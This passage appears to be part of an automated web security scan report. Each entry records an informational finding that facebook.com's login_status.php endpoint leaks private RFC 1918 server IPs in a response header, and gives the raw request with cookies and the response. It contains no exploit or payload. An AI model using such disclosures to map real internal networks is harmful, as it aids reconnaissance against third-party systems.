GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2bcde7c3%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3dfcf2578%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff4a76348%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfafddf1c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff4a76348&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df6b3dcb9%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff4a76348&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df21ed39c58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2b994818%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dff4a76348&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.32.190.106
X-Cnection: close
Date: Thu, 16 Jun 2011 16:49:02 GMT
Content-Length: 22

Invalid Application ID

19.691. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.132.131

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df385fd2dbc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33f215918%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5e2ae85%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df348b86ff%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5e2ae85&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8896c978%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5e2ae85&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11ef6bdac%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3d6a4ceb4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df5e2ae85&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.132.131
X-Cnection: close
Date: Thu, 16 Jun 2011 14:55:20 GMT
Content-Length: 22

Invalid Application ID

19.692. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.176.49

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1203060d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfa0160d14%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda8db448%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7fb1784%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda8db448&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3da78c9e4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda8db448&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df633f244c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff321cafa4%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfda8db448&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.176.49
X-Cnection: close
Date: Thu, 16 Jun 2011 17:35:35 GMT
Content-Length: 22

Invalid Application ID

19.693. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.23.50

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df27eb60554%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df36b9a62bc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25505e264%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfcb9cd73c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25505e264&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df93c7b83c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25505e264&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34e41aebc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff2f8752af%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df25505e264&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.23.50
X-Cnection: close
Date: Thu, 16 Jun 2011 13:42:59 GMT
Content-Length: 22

Invalid Application ID

19.694. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.55.7.44

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df97edcfdc%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff41dc3238%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8a7c84a8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff41dc3238%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a78aa58%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df70630158%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff41dc3238%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a78aa58&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df657f19d4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff41dc3238%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a78aa58&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df39f436bd4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff41dc3238%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df8a78aa58&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.55.7.44
X-Cnection: close
Date: Thu, 16 Jun 2011 16:43:52 GMT
Content-Length: 22

Invalid Application ID

19.695. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.27.113.120

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df19b26b4d%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3677b9138%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df3418fc0f%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3677b9138%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f658a4cc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df275b003ec%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3677b9138%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f658a4cc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2f0f81e6%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3677b9138%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f658a4cc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1b8ec2378%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff3677b9138%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2f658a4cc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.113.120
X-Cnection: close
Date: Thu, 16 Jun 2011 18:22:12 GMT
Content-Length: 22

Invalid Application ID

19.696. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.62.221.44

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df30276ed58%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df24a2c5c0%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df873d914%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df33066d488%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df873d914&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df31dc5523%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df873d914&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df341e83e34%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff14a87b2b8%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df873d914&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.221.44
X-Cnection: close
Date: Thu, 16 Jun 2011 17:20:07 GMT
Content-Length: 22

Invalid Application ID

19.697. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.183.59

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df23ce6639%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df11f41af4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3986472d%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df28fe79bc4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3986472d&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df34bb58144%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3986472d&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfbed0d854%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16ec17f94%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3986472d&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.183.59
X-Cnection: close
Date: Thu, 16 Jun 2011 14:13:59 GMT
Content-Length: 22

Invalid Application ID

19.698. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.219.40

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1c598d894%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df108123894%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d46feacc%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df350b930c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d46feacc&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df69582324%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d46feacc&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfd3054bc8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff25c0fb1fc%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df3d46feacc&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.219.40
X-Cnection: close
Date: Thu, 16 Jun 2011 16:38:42 GMT
Content-Length: 22

Invalid Application ID

19.699. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.54.72.47

Request

GET /extern/login_status.php?api_key=your%20app%20id&app_id=your%20app%20id&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df1a8947928%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b26e4ce8%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e963a82c%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df8773e0f%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e963a82c&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df316bcff4%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e963a82c&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df310138c4c%26origin%3Dhttp%253A%252F%252Fwww.cnbc.com%252Ff16f176c18%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Df2e963a82c&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.cnbc.com/id/43422860
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; datr=3GHNTeTln1shCRlV4nyEfKsc

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.72.47
X-Cnection: close
Date: Thu, 16 Jun 2011 16:07:39 GMT
Content-Length: 22

Invalid Application ID

19.700. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

10.63.23.31

Request

